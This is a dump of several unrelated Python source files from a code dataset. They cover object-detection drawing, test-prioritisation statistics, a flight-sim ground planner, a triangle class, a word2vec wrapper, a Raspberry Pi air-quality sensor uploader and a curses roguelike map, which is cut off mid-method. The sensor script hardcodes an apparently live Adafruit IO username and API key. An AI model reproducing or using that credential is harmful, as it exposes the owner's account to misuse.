valid_boxes[i][:4]\n x1 = int(box[0] - (input_size-(org_w/(1/resize_ratio))))\n if x1<0:\n x1 = 0\n \n y1 = int(box[1] - (input_size-(org_h/(1/resize_ratio))))\n if y1<0:\n y1 = 0\n \n x2 = int(box[2] - (input_size-(org_w/(1/resize_ratio))))\n if x2>org_w:\n x2 = org_w\n \n y2 = int(box[3] - (input_size-(org_h/(1/resize_ratio))))\n if y2>org_h:\n y2 = org_h\n\n valid_class = valid_classes[i]\n \n fontScale = 0.5\n score = valid_scores[i]\n bbox_color = colors[valid_class]\n bbox_thick = 2\n c1, c2 = (x1, y1), (x2, y2)\n \n cv2.rectangle(original_image_ny, (x1,y1) ,(x2,y2), bbox_color, bbox_thick)\n \n bbox_mess = '%s: %.2f' % (labels[valid_class], score)\n t_size = cv2.getTextSize(bbox_mess, 0, fontScale, thickness=bbox_thick // 2)[0]\n c3 = (c1[0] + t_size[0], c1[1] - t_size[1] - 3)\n cv2.rectangle(original_image_ny, c1, (np.float32(c3[0]), np.float32(c3[1])), bbox_color, -1) #filled\n\n cv2.putText(original_image_ny, bbox_mess, (c1[0], np.float32(c1[1] - 2)), cv2.FONT_HERSHEY_SIMPLEX,fontScale, (0, 0, 0), bbox_thick // 2, lineType=cv2.LINE_AA)\n \n tf.keras.preprocessing.image.save_img(args.img_save_path + '\\{}'.format(base_name),original_image_ny)\n# plt.imshow(image_resize_ny) \n end=time.time()\n print(f\"Runtime of the program is {end - start}\")\n\n\n# In[10]:\n\n\nif __name__ == \"__main__\":\n args = parse_args(sys.argv[1:])\n main(args)\n\n","sub_path":"detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":7295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"483741137","text":"import os\nimport numpy as np\nfrom collections import defaultdict\n\ndef tree(): return defaultdict(tree)\n\ndef readFile(filepath):\n f = open(filepath)\n content = f.read()\n f.close()\n return content.splitlines()\n\nif __name__ == '__main__':\n path = '../../subjects/'\n subjects = readFile(path + 'uselist-testclass')\n g = 4\n tc = 1.5\n result = tree()\n apps = ['greedytotal_withouttime.txt','greedyadditional_withouttime.txt','genetic_withouttime.txt','arp_withouttime.txt','greedytotal_withtime.txt','greedyadditional_withtime.txt','genetic_withtime.txt','arp_withtime.txt','random']\n for subject in subjects:\n subject_path = path + subject + '/testclass/'\n for app in apps:\n if app != 'random':\n temp_apfdc = eval(readFile(subject_path + str(tc) + 'avg-new/evaluate/' + str(g) + '/apfdc_total/' + app)[0])\n else:\n temp_list = []\n for i in range(50):\n temp_list.append(eval(readFile(subject_path + str(tc) + 'avg-new/evaluate/' + str(g) + '/apfdc_total/' + app + str(i) + '.txt')[0]))\n temp_apfdc = np.mean(temp_list)\n temp_ft = eval(readFile(subject_path + str(tc) + 'avg-new/evaluate/' + str(g) + '/dectedtime/firsttime/' + app)[0])\n temp_at = eval(readFile(subject_path + str(tc) + 'avg-new/evaluate/' + str(g) + '/dectedtime/averagetime/' + app)[0])\n result[subject][g][tc][app]['apfdc'] = temp_apfdc\n result[subject][g][tc][app]['ft'] = temp_ft\n result[subject][g][tc][app]['at'] = temp_at\n metrics = ['apfdc','ft','at']\n labels = ['ugt','uga','uge','uarp','agt','aga','age','aarp','random']\n for metric in metrics:\n print('metric : ' + metric)\n f = open('data_rq3/%s_testclass.csv'%metric,'w')\n tempstr = ''\n for app_index in range(len(apps)):\n app = apps[app_index]\n tempstr = tempstr + '%s,'%labels[app_index]\n f.write(str(tempstr[0:-1]) + '\\n')\n for subject in subjects:\n tempstr = ''\n for app in apps:\n tempstr = tempstr + '%s,'%(result[subject][g][tc][app][metric])\n f.write(str(tempstr[0:-1]) + '\\n')\n f.close()\n for app in apps:\n templist = []\n for subject in subjects:\n templist.append(result[subject][g][tc][app][metric])\n if metric == 'apfdc':\n print(app + ' : %.4f'%np.mean(templist))\n else:\n print(app + ' : %.2f'%np.mean(templist))\n print('**************') \n\n\n","sub_path":"code/statistic/rq3-testclass.py","file_name":"rq3-testclass.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"51134997","text":"import random\nfrom enum import Enum\n\nfrom dcs.vehicles import *\n\nfrom gen import Conflict\nfrom gen.ground_forces.combat_stance import CombatStance\nfrom theater import ControlPoint\n\nimport pydcs_extensions.frenchpack.frenchpack as frenchpack\n\nTYPE_TANKS = [\n Armor.MBT_T_55,\n Armor.MBT_T_72B,\n Armor.MBT_T_80U,\n Armor.MBT_T_90,\n Armor.MBT_Leopard_2,\n Armor.MBT_Leopard_1A3,\n Armor.MBT_Leclerc,\n Armor.MBT_Challenger_II,\n Armor.MBT_M1A2_Abrams,\n Armor.MBT_M60A3_Patton,\n Armor.MBT_Merkava_Mk__4,\n Armor.ZTZ_96B,\n\n # WW2\n Armor.MT_Pz_Kpfw_V_Panther_Ausf_G,\n Armor.MT_Pz_Kpfw_IV_Ausf_H,\n Armor.HT_Pz_Kpfw_VI_Tiger_I,\n Armor.HT_Pz_Kpfw_VI_Ausf__B__Tiger_II,\n Armor.MT_M4_Sherman,\n Armor.MT_M4A4_Sherman_Firefly,\n Armor.StuG_IV,\n Armor.ST_Centaur_IV,\n Armor.CT_Cromwell_IV,\n Armor.HIT_Churchill_VII,\n\n # Mods\n frenchpack.DIM__TOYOTA_BLUE,\n frenchpack.DIM__TOYOTA_GREEN,\n frenchpack.DIM__TOYOTA_DESERT,\n frenchpack.DIM__KAMIKAZE,\n\n frenchpack.AMX_10RCR,\n frenchpack.AMX_10RCR_SEPAR,\n frenchpack.AMX_30B2,\n frenchpack.Leclerc_Serie_XXI,\n\n]\n\nTYPE_ATGM = [\n Armor.ATGM_M1045_HMMWV_TOW,\n Armor.ATGM_M1134_Stryker,\n Armor.IFV_BMP_2,\n\n # WW2 (Tank Destroyers)\n Armor.M30_Cargo_Carrier,\n Armor.TD_Jagdpanzer_IV,\n Armor.TD_Jagdpanther_G1,\n Armor.TD_M10_GMC,\n\n # Mods\n frenchpack.VBAE_CRAB_MMP,\n frenchpack.VAB_MEPHISTO,\n frenchpack.TRM_2000_PAMELA,\n\n]\n\nTYPE_IFV = [\n Armor.IFV_BMP_3,\n Armor.IFV_BMP_2,\n Armor.IFV_BMP_1,\n Armor.IFV_Marder,\n Armor.IFV_MCV_80,\n Armor.IFV_LAV_25,\n Armor.IFV_Sd_Kfz_234_2_Puma,\n Armor.IFV_M2A2_Bradley,\n Armor.IFV_BMD_1,\n Armor.ZBD_04A,\n\n # WW2\n Armor.IFV_Sd_Kfz_234_2_Puma,\n Armor.LAC_M8_Greyhound,\n\n # Mods\n frenchpack.ERC_90,\n frenchpack.VBAE_CRAB,\n frenchpack.VAB_T20_13\n\n]\n\nTYPE_APC = [\n Armor.APC_M1043_HMMWV_Armament,\n Armor.APC_M1126_Stryker_ICV,\n Armor.APC_M113,\n Armor.APC_BTR_80,\n Armor.APC_MTLB,\n Armor.APC_M2A1,\n Armor.APC_Cobra,\n Armor.APC_Sd_Kfz_251,\n Armor.APC_AAV_7,\n Armor.TPz_Fuchs,\n Armor.ARV_BRDM_2,\n Armor.ARV_BTR_RD,\n Armor.FDDM_Grad,\n\n # WW2\n Armor.APC_M2A1,\n Armor.APC_Sd_Kfz_251,\n\n # Mods\n frenchpack.VAB__50,\n frenchpack.VBL__50,\n frenchpack.VBL_AANF1,\n\n]\n\nTYPE_ARTILLERY = [\n Artillery.MLRS_9A52_Smerch,\n Artillery.SPH_2S1_Gvozdika,\n Artillery.SPH_2S3_Akatsia,\n Artillery.MLRS_BM_21_Grad,\n Artillery.MLRS_9K57_Uragan_BM_27,\n Artillery.SPH_M109_Paladin,\n Artillery.MLRS_M270,\n Artillery.SPH_2S9_Nona,\n Artillery.SpGH_Dana,\n Artillery.SPH_2S19_Msta,\n Artillery.MLRS_FDDM,\n\n # WW2\n Artillery.Sturmpanzer_IV_Brummbär,\n Artillery.M12_GMC\n]\n\nTYPE_LOGI = [\n Unarmed.Transport_M818,\n Unarmed.Transport_KAMAZ_43101,\n Unarmed.Transport_Ural_375,\n Unarmed.Transport_GAZ_66,\n Unarmed.Transport_GAZ_3307,\n Unarmed.Transport_GAZ_3308,\n Unarmed.Transport_Ural_4320_31_Armored,\n Unarmed.Transport_Ural_4320T,\n Unarmed.Blitz_3_6_6700A,\n Unarmed.Kübelwagen_82,\n Unarmed.Sd_Kfz_7,\n Unarmed.Sd_Kfz_2,\n Unarmed.Willys_MB,\n Unarmed.Land_Rover_109_S3,\n Unarmed.Land_Rover_101_FC,\n\n # Mods\n frenchpack.VBL,\n frenchpack.VAB,\n\n]\n\nTYPE_INFANTRY = [\n Infantry.Infantry_Soldier_Insurgents,\n Infantry.Soldier_AK,\n Infantry.Infantry_M1_Garand,\n Infantry.Infantry_Mauser_98,\n Infantry.Infantry_SMLE_No_4_Mk_1,\n Infantry.Georgian_soldier_with_M4,\n Infantry.Infantry_Soldier_Rus,\n Infantry.Paratrooper_AKS,\n Infantry.Paratrooper_RPG_16,\n Infantry.Soldier_M249,\n Infantry.Infantry_M4,\n Infantry.Soldier_RPG,\n]\n\nMAX_COMBAT_GROUP_PER_CP = 10\n\nclass CombatGroupRole(Enum):\n TANK = 1\n APC = 2\n IFV = 3\n ARTILLERY = 4\n SHORAD = 5\n LOGI = 6\n INFANTRY = 7\n ATGM = 8\n\n\nDISTANCE_FROM_FRONTLINE = {\n CombatGroupRole.TANK:3200,\n CombatGroupRole.APC:8000,\n CombatGroupRole.IFV:3700,\n CombatGroupRole.ARTILLERY:18000,\n CombatGroupRole.SHORAD:13000,\n CombatGroupRole.LOGI:20000,\n CombatGroupRole.INFANTRY:3000,\n CombatGroupRole.ATGM:6200\n}\n\nGROUP_SIZES_BY_COMBAT_STANCE = {\n CombatStance.DEFENSIVE: [2, 4, 6],\n CombatStance.AGGRESSIVE: [2, 4, 6],\n CombatStance.RETREAT: [2, 4, 6, 8],\n CombatStance.BREAKTHROUGH: [4, 6, 6, 8],\n CombatStance.ELIMINATION: [2, 4, 4, 4, 6],\n CombatStance.AMBUSH: [1, 1, 2, 2, 2, 2, 4]\n}\n\n\nclass CombatGroup:\n\n def __init__(self, role:CombatGroupRole):\n self.units = []\n self.role = role\n self.assigned_enemy_cp = None\n self.start_position = None\n\n def __str__(self):\n s = \"\"\n s += \"ROLE : \" + str(self.role) + \"\\n\"\n if len(self.units) > 0:\n s += \"UNITS \" + self.units[0].name + \" * \" + str(len(self.units))\n return s\n\nclass GroundPlanner:\n\n cp = None\n combat_groups_dict = {}\n connected_enemy_cp = []\n\n tank_groups = []\n apc_group = []\n ifv_group = []\n art_group = []\n shorad_groups = []\n logi_groups = []\n\n def __init__(self, cp:ControlPoint, game):\n self.cp = cp\n self.game = game\n self.connected_enemy_cp = [cp for cp in self.cp.connected_points if cp.captured != self.cp.captured]\n self.tank_groups = []\n self.apc_group = []\n self.ifv_group = []\n self.art_group = []\n self.atgm_group = []\n self.logi_groups = []\n self.shorad_groups = []\n\n self.units_per_cp = {}\n for cp in self.connected_enemy_cp:\n self.units_per_cp[cp.id] = []\n self.reserve = []\n\n\n def plan_groundwar(self):\n\n if hasattr(self.cp, 'stance'):\n group_size_choice = GROUP_SIZES_BY_COMBAT_STANCE[self.cp.stance]\n else:\n self.cp.stance = CombatStance.DEFENSIVE\n group_size_choice = GROUP_SIZES_BY_COMBAT_STANCE[CombatStance.DEFENSIVE]\n\n # Create combat groups and assign them randomly to each enemy CP\n for key in self.cp.base.armor.keys():\n\n role = None\n collection = None\n if key in TYPE_TANKS:\n collection = self.tank_groups\n role = CombatGroupRole.TANK\n elif key in TYPE_APC:\n collection = self.apc_group\n role = CombatGroupRole.APC\n elif key in TYPE_ARTILLERY:\n collection = self.art_group\n role = CombatGroupRole.ARTILLERY\n elif key in TYPE_IFV:\n collection = self.ifv_group\n role = CombatGroupRole.IFV\n elif key in TYPE_LOGI:\n collection = self.logi_groups\n role = CombatGroupRole.LOGI\n elif key in TYPE_ATGM:\n collection = self.atgm_group\n role = CombatGroupRole.ATGM\n else:\n print(\"Warning unit type not handled by ground generator\")\n print(key)\n continue\n\n available = self.cp.base.armor[key]\n while available > 0:\n n = random.choice(group_size_choice)\n if n > available:\n if available >= 2:\n n = 2\n else:\n n = 1\n available -= n\n\n group = CombatGroup(role)\n if len(self.connected_enemy_cp) > 0:\n enemy_cp = random.choice(self.connected_enemy_cp).id\n self.units_per_cp[enemy_cp].append(group)\n group.assigned_enemy_cp = enemy_cp\n else:\n self.reserve.append(group)\n group.assigned_enemy_cp = \"__reserve__\"\n\n for i in range(n):\n group.units.append(key)\n collection.append(group)\n\n print(\"------------------\")\n print(\"Ground Planner : \")\n print(self.cp.name)\n print(\"------------------\")\n for key in self.units_per_cp.keys():\n print(\"For : #\" + str(key))\n for group in self.units_per_cp[key]:\n print(str(group))\n\n\n\n\n\n\n\n\n\n","sub_path":"gen/ground_forces/ai_ground_planner.py","file_name":"ai_ground_planner.py","file_ext":"py","file_size_in_byte":8164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"159759372","text":"import math\n\nimport triangle\n\nclass Isosceles(triangle.Triangle):\n \"\"\"An isoscles triangle shape\n\n The shape defined by one side length and one angle.\n \"\"\"\n def __init__(self, turtle, a = None, angle = None):\n \"\"\"Main constructor\n\n Calls parent constructor with the computed third side length.\n \"\"\"\n other_side = math.sqrt((2 * (a **2)) - (2 * (a ** 2) * math.cos(angle * ((2 * math.pi) / 360))))\n super().__init__(turtle, a, a, other_side)\n\n\n def is_triangle(self):\n \"\"\"Checks if shape is a valid triangle\n \"\"\"\n return True\n\n\n def __str__(self):\n \"\"\"Gets string representation of instance\n \"\"\"\n return \"Isoceles with sides (a: {}, b: {}, c: {}), angles ({}), perimeter: {}, area: {}\".format(\n self.a,\n self.b,\n self.c,\n self.angles(),\n self.perimeter(),\n self.area())\n","sub_path":"assign-07-triangle/isosceles.py","file_name":"isosceles.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"242238308","text":"import pickle\nimport numpy as np\nimport os\nfrom gensim.models.word2vec import Word2Vec\n\nfrom corpus import Corpus\nfrom util.functions import get_config\n\n\nMODEL_NAME = \"word2vec_model\"\nANS_DICT_NAME = \"ans_dict\"\n\n\nclass MyWord2Vec:\n def train(self, corpus, model_dir, **kwargs):\n print(\"start training : word2vec\")\n self.__model = Word2Vec(corpus, **kwargs)\n print(\"finished\")\n\n model_path = model_dir + MODEL_NAME\n self.__model.save(model_path)\n print(\"model was saved\")\n\n print(\"infer answer documents\")\n self.__ans_dict = self.__make_ans_dict(corpus)\n ans_dict_path = model_dir + \"/\" + ANS_DICT_NAME\n with open(ans_dict_path, \"wb\") as f:\n pickle.dump(self.__ans_dict, f)\n print(\"finished\")\n\n @staticmethod\n def load(model_dir):\n # load word2vec model\n model_path = model_dir + MODEL_NAME\n self = MyWord2Vec()\n self.__model = Word2Vec.load(model_path)\n\n # load ans dict\n ans_dict_path = model_dir + ANS_DICT_NAME\n with open(ans_dict_path, \"rb\") as f:\n self.__ans_dict = pickle.load(f)\n\n return self\n\n def words2image(self, words):\n image = [self.__infer_vector(word) for word in words]\n image = list(filter(lambda x: len(x) != 0, image))\n return image\n\n def __infer_vector(self, word):\n try:\n return self.__model[word]\n except KeyError:\n return []\n\n def __make_ans_dict(self, corpus):\n ans_dict = {}\n for idx, words in corpus.gen_ans_with_idx():\n ans_dict[idx] = np.array(self.words2image(words))\n return ans_dict\n\n def get_ans_vec(self, idx):\n return self.__ans_dict[idx]\n\n def __len__(self):\n return self.__model.vector_size\n\nif __name__ == \"__main__\":\n print(\"*** word2vec ***\")\n config = get_config()\n # word2vecは学習が早いのでminiは不要\n config[\"mini\"] = False\n corpus = Corpus(mini=config[\"mini\"])\n\n word2vec = MyWord2Vec()\n model_dir = config[\"model_root\"] + config[\"word2vec\"][\"model_dir\"]\n if not os.path.exists(model_dir):\n os.makedirs(model_dir)\n word2vec.train(corpus, model_dir, **config[\"word2vec\"][\"hyper_params\"])\n\n word2vec = MyWord2Vec.load(model_dir)\n print(word2vec.get_ans_vec(\"1\"))\n","sub_path":"insuranceQA/word2vec.py","file_name":"word2vec.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"185168673","text":"# code to run the loop for unit B\n# at each second, Unit B checks the API for the status that for the signal\n# every 10 seconds, it sends the sensor data to the API\n\n\n# import relevant libraries\n\n# system libraries\nimport time\nimport threading\n\n# for the Adafruit IO API\nfrom Adafruit_IO import Client\n\n# for the SGP30 functions, including I2C \nimport board\nimport busio\n\n# imports the SGP30-specific library\nimport adafruit_sgp30\n\n# importing gas module of enviroplus library\nfrom enviroplus import gas\n\n\n# neccessary definitions for sensors and API\n\n# defines the username and key for the API\naio = Client(\"rmason200\", \"d5b8d9b68d654dfb965acfb8dc1e7ffd\")\n\n# enables the I2C for the SGP30, defining pin inputs etc\ni2c = busio.I2C(board.SCL, board.SDA, frequency=100000)\n\n#initialises the SGP30 sensor, defines properties according to adafruit documentation\nsgp30 = adafruit_sgp30.Adafruit_SGP30(i2c)\nsgp30.iaq_init()\nsgp30.set_iaq_baseline(0x8973, 0x8aae)\n\n\n# loop counter\ncount = 0\n\n\ndef data_send():\n\t# reads data from sensors, assigns value to relevant variable\n\t# for SGP30 a simple read\n\teCO2_data = sgp30.eCO2\n\ttvoc_data = sgp30.TVOC\n\t# for enviroplus, gas readings taken to intermediary variable\n\tenviro_readings = gas.read_all()\n\t# specific reading taken from intermediary variable and assigned to specific variable \n\tredu_data = enviro_readings.reducing\n\toxi_data = enviro_readings.oxidising\n\n\t# prints values to terminal\n\tprint(\"eCO2:\\t\" + str(eCO2_data))\n\tprint(\"TVOC:\\t\" + str(tvoc_data))\n\tprint(\"CO:\\t\" + str(redu_data))\n\tprint(\"NO2:\\t\" + str(oxi_data))\n\n\t# sends values to API\n\taio.send('eco2-b', eCO2_data)\n\taio.send('tvoc-b', tvoc_data)\n\taio.send('redu-b', redu_data)\n\taio.send('oxi-b', oxi_data)\n\n\nwhile True:\n\t# sets up time variable needed to ensure loop happens once a second\n\t# rather than + 1 second\n\tstarttime = time.time()\n\t\n\t# prints counter to display progress of loop\n\tprint(\"\\nCount: \" + str(count))\n\tprint(\"Time: \" + str(time.time()))\n\t\n\t# receives status of signal from API, prints to terminal\n\tUnitB_status = aio.receive('status-b').value\n\tprint(\"Unit B Signal State: \" + str(UnitB_status))\n\t\n\tif count == 10:\n\t\t# creates a thread to allow the data send process to run in parallel\n\t\tdata_send_thread = threading.Thread(target = data_send)\n\t\t# starts the thread\n\t\tdata_send_thread.start()\n\t\t\n\t\t# resets count to start loop again\n\t\tcount = 0\n \n\t# increments loop\n\tcount = count + 1\n\t# sleeps process for the rest of the second\n\t# takes process time and removes it from the second, then sleeps for remaining time\n\ttime.sleep(1.0 - ((time.time() - starttime) % 60))\n","sub_path":"Other/UnitB1.py","file_name":"UnitB1.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"369376986","text":"\"\"\"\nGame map interface\n\"\"\"\nimport curses\nimport json\nimport logging\nimport random\nfrom pathlib import Path\nfrom pprint import pformat\nfrom typing import List, Set, Tuple\n\nimport constants\nimport globals\nfrom dialog import Dialog\nfrom items import Consumable, Equipment, Weapon\nfrom monster import Monster\nfrom player import Player, Position\nfrom user_interface import UserInterface\nfrom utility import color\n\n\nclass GameMap(UserInterface):\n \"\"\"\n Main User Interface to show current\n position, current map, current health,\n current power and the event log\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.event_log = None\n self.map = None\n self.status_info = None\n self.levels = list()\n self.level_width = 51\n self.level_height = 15\n self.levels = list()\n self.items = dict()\n self.monsters = dict()\n self.starting_positions = list()\n self.stories_shown = set()\n for index, file in enumerate(\n sorted(\n (Path(__file__).parent.parent / 'resources' / 'levels')\n .glob('*.level'),\n key=lambda x: int(x.stem)\n )\n ):\n with file.open() as level:\n self.levels.append(self.parse_level(level.read(), index))\n self.player = Player(Position(self.level_width, self.level_height,\n layouts=self.levels))\n self.player.position.x, self.player.position.y = \\\n self.starting_positions[0]\n self._last_position = self.current_position\n self.visited: List[Set[Tuple[int, int]]] = [set() for _ in\n range(len(self.levels))]\n self.seen: List[Set[Tuple[int, int]]] = [set() for _ in\n range(len(self.levels))]\n self.setup()\n\n @property\n def health_bar(self):\n health_bar = int(10 * (self.player.current_health\n / self.player.max_health)) * constants.HEALTH\n return health_bar\n\n @property\n def current_value(self) -> str:\n return self.levels[self.player.level][self.player.y][self.player.x]\n\n @current_value.setter\n def current_value(self, value: str):\n self.levels[self.player.level][self.player.y][self.player.x] = value\n\n @property\n def current_position(self):\n return self.player.x, self.player.y\n\n def save_game(self):\n data = {\n 'monsters': {str(key): vars(monster) for key, monster in\n self.monsters.items()},\n 'items': {str(key): vars(item) for key, item in\n self.items.items()},\n 'starting_positions': [list(position) for position in\n self.starting_positions],\n 'levels': self.levels,\n 'player_items': {\n 'head': vars(self.player.head) if self.player.head else None,\n 'chest': vars(self.player.chest)\n if self.player.chest else None,\n 'legs': vars(self.player.legs) if self.player.legs else None,\n 'feet': vars(self.player.feet) if self.player.feet else None,\n 'weapon': vars(self.player.weapon)\n if self.player.weapon else None,\n 'cookies': [vars(cookie) for cookie in self.player.cookies\n if cookie]\n },\n 'damage': self.player.damage,\n 'last_position': list(self._last_position),\n 'level': self.player.level,\n 'current_position': list(self.current_position),\n 'visited': [[list(position) for position in level] for level in\n self.visited],\n 'seen': [[list(position) for position in level] for level in\n self.seen],\n 'stories_shown': list(self.stories_shown)\n }\n with (Path(__file__).parent.parent / 'savegame.json').open(mode='w') \\\n as file:\n logging.info(pformat(data))\n json.dump(data, file, default=lambda x: vars(x))\n\n @classmethod\n def load_game(cls, filename: str):\n with (Path(__file__).parent.parent / filename).open() as file:\n data = json.load(file)\n game_map = cls()\n for position, monster_data in data['monsters'].items():\n position = tuple(int(i) for i in position[1:-1].split(', '))\n monster = Monster(1)\n monster.strength = monster_data['strength']\n monster.name = monster_data['name']\n game_map.monsters[position] = monster\n for position, item_data in data['items'].items():\n position = tuple(int(i) for i in position[1:-1].split(', '))\n item = Consumable(1) if item_data['type'] == 'Keks' \\\n else Equipment(1)\n item.name = item_data['name']\n item.factor = item_data['factor']\n item.type = item_data['type']\n game_map.items[position] = item\n game_map.starting_positions = [tuple(position) for position in\n data['starting_positions']]\n game_map.levels = data['levels']\n head = data['player_items']['head']\n chest = data['player_items']['chest']\n legs = data['player_items']['legs']\n feet = data['player_items']['feet']\n weapon = data['player_items']['weapon']\n cookies = data['player_items']['cookies']\n game_map.player.head = head if not head else Equipment(1)\n if head:\n game_map.player.head.factor = head['factor']\n game_map.player.head.name = head['name']\n game_map.player.head.type = head['type']\n game_map.player.chest = chest if not chest else Equipment(1)\n if chest:\n game_map.player.chest.factor = chest['factor']\n game_map.player.chest.name = chest['name']\n game_map.player.chest.type = chest['type']\n game_map.player.legs = legs if not legs else Equipment(1)\n if legs:\n game_map.player.legs.factor = legs['factor']\n game_map.player.legs.name = legs['name']\n game_map.player.legs.type = legs['type']\n game_map.player.feet = feet if not feet else Equipment(1)\n if feet:\n game_map.player.feet.factor = feet['factor']\n game_map.player.feet.name = feet['name']\n game_map.player.feet.type = feet['type']\n game_map.player.weapon = weapon if not weapon else Weapon(1)\n if weapon:\n game_map.player.weapon.factor = weapon['factor']\n game_map.player.weapon.name = weapon['name']\n game_map.player.weapon.type = weapon['type']\n game_map.player.cookies = list()\n for cookie_data in cookies:\n cookie = Consumable(1)\n cookie.factor = cookie_data['factor']\n cookie.name = cookie_data['name']\n cookie.type = cookie_data['type']\n game_map.player.cookies.append(cookie)\n game_map.player.position._level = data['level']\n game_map.player.damage = data['damage']\n game_map._last_position = (data['last_position'][0],\n data['last_position'][1])\n game_map.player.position._x = data['current_position'][0]\n game_map.player.position._y = data['current_position'][1]\n game_map.visited = [set(tuple(position) for position in level) for\n level in data['visited']]\n game_map.seen = [set(tuple(position) for position in level) for level\n in data['seen']]\n game_map.stories_shown = set(data['stories_shown'])\n return game_map\n\n def parse_level(self, level: str, level_number: int) -> List[List[str]]:\n level = level.replace('-', constants.HORIZONTAL)\n level = level.replace('|', constants.VERTICAL)\n level = level.replace('+', constants.CROSS)\n level = [[char for char in row]\n for row in level.split('\\n')]\n for y_index, row in enumerate(level):\n for x_index, value in enumerate(row):\n if x_index == 0 and y_index == 0:\n level[y_index][x_index] = constants.BOTTOM_RIGHT\n elif x_index == 0 and y_index == len(level) - 1:\n level[y_index][x_index] = constants.TOP_RIGHT\n elif x_index == len(row) - 1 and y_index == len(level) - 1:\n level[y_index][x_index] = constants.TOP_LEFT\n elif x_index == len(row) - 1 and y_index == 0:\n level[y_index][x_index] = constants.BOTTOM_LEFT\n elif y_index == 0 and value == constants.CROSS:\n level[y_index][x_index] = constants.TOP_OUT\n elif y_index == len(level) - 1 and value == constants.CROSS:\n level[y_index][x_index] = constants.BOTTOM_OUT\n elif x_index == 0 and value == constants.CROSS:\n level[y_index][x_index] = constants.LEFT_OUT\n elif x_index == len(row) - 1 and value == constants.CROSS:\n level[y_index][x_index] = constants.RIGHT_OUT\n if value == 'I':\n self.items[(level_number, x_index, y_index)] = \\\n random.choice((Consumable, Equipment,\n Weapon))(level_number + 1)\n elif value == 'M':\n self.monsters[(level_number, x_index, y_index)] = \\\n Monster(level_number + 1)\n elif value == '%':\n self.starting_positions.append((x_index, y_index))\n if level_number == 0:\n level[y_index][x_index] = ' '\n return level\n\n def level_value(self, x_index: int, y_index: int) -> str:\n return self.levels[self.player.level][y_index][x_index]\n\n def visit(self, x_index: int, y_index: int):\n for vertical in range(-1, 2):\n for horizontal in range(-1, 2):\n self.visited[self.player.level].add((x_index + horizontal,\n y_index + vertical))\n self.seen[self.player.level].add((x_index + horizontal,\n y_index + vertical))\n\n def see(self, x_index: int, y_index: int):\n for vertical in range(-1, 2):\n for horizontal in range(-1, 2):\n self.seen[self.player.level].add((x_index + horizontal,\n y_index + vertical))\n\n def log_event(self, message):\n self.event_log.move(1, 1)\n self.event_log.deleteln()\n self.event_log.move(self.event_log.getmaxyx()[0] - 2, 1)\n self.event_log.insertln()\n self.event_log.border()\n self.event_log.addstr(self.event_log.getmaxyx()[0] - 2, 1,\n message, color(foreground=curses.COLOR_YELLOW))\n\n def setup(self):\n self.screen = curses.newwin(0, 0)\n height, width = self.screen.getmaxyx()\n self.map = curses.newwin(self.level_height, self.level_width + 1,\n 2, width // 2 - self.level_width // 2)\n map_height, _ = self.map.getmaxyx()\n self.status_info = curses.newwin(3, width - 5, map_height + 2, 3)\n self.event_log = curses.newwin(height - (map_height + 6), width - 5,\n map_height + 5, 3)\n self.status_info.border()\n self.event_log.border()\n\n def refresh(self):\n self.screen.redrawwin()\n self.map.redrawwin()\n self.status_info.redrawwin()\n self.event_log.redrawwin()\n self.screen.refresh()\n self.map.refresh()\n self.status_info.refresh()\n self.event_log.refresh()\n\n def print(self):\n \"\"\"\n print game map to window\n \"\"\"\n if self.resized:\n self.resized = False\n self.setup()\n\n self.screen.addstr(1, 3, f\"Ebene {self.player.level}\")\n self.screen.addstr(1, 20, f'Position: {self.current_position}')\n\n if self.player.level < len(self.visited):\n self.visit(*self.current_position)\n for i in (-1, 1):\n if self.level_value(self.current_position[0] + i,\n self.current_position[1]) == ' ':\n self.see(self.current_position[0] + i,\n self.current_position[1])\n if self.level_value(self.current_position[0],\n self.current_position[1] + i) == ' ':\n self.see(self.current_position[0],\n self.current_position[1] + i)\n if 0 <= self.player.level < len(self.levels):\n for y_index, row in enumerate(self.levels[self.player.level]):\n for x_index, value in enumerate(row):\n if (x_index, y_index) not in self.seen[self.player.level]:\n self.map.addstr(y_index, x_index, '#',\n color(foreground=curses.COLOR_BLUE))\n elif (x_index, y_index) \\\n not in self.visited[self.player.level] \\\n and value in ('M', 'O', 'I'):\n self.map.addstr(y_index, x_index, constants.UNKNOWN,\n color(foreground=curses.COLOR_MAGENTA))\n elif value == 'I':\n self.map.addstr(y_index, x_index, constants.ITEM,\n color(foreground=curses.COLOR_CYAN))\n elif value == 'X':\n self.map.addstr(y_index, x_index, constants.SAVEPOINT,\n color(foreground=curses.COLOR_BLUE))\n elif value == '=':\n self.map.addstr(y_index, x_index, constants.LADDER_UP,\n color(foreground=curses.COLOR_GREEN))\n elif value == '%':\n self.map.addstr(y_index, x_index,\n constants.LADDER_DOWN,\n color(foreground=curses.COLOR_GREEN))\n elif value == 'M':\n self.map.addstr(y_index, x_index, constants.MONSTER,\n color(foreground=curses.COLOR_RED))\n elif value == 'O':\n self.map.addstr(y_index, x_index, constants.HOLE)\n else:\n self.map.addstr(y_index, x_index, value)\n\n self.map.addstr(self.current_position[1], self.current_position[0],\n constants.PLAYER,\n color(foreground=curses.COLOR_YELLOW))\n\n self.status_info.addstr(1, 2, \"HP: \")\n self.status_info.addstr(1, 6, 10 * ' ',\n color(foreground=curses.COLOR_RED))\n self.status_info.addstr(1, 6, self.health_bar,\n color(foreground=curses.COLOR_RED))\n\n self.status_info.addstr(1, 17,\n f'{self.player.current_health:3}/'\n f'{self.player.max_health:3}')\n self.status_info.addstr(1, 27, f\"Staerke: {self.player.strength}\")\n\n self.refresh()\n\n def handle(self, key: int, previous=None):\n self._last_position = self.current_position\n\n if self.player.current_health < 1:\n return globals.GAME_OVER\n elif key in (constants.ESCAPE, constants.SPACE):\n return 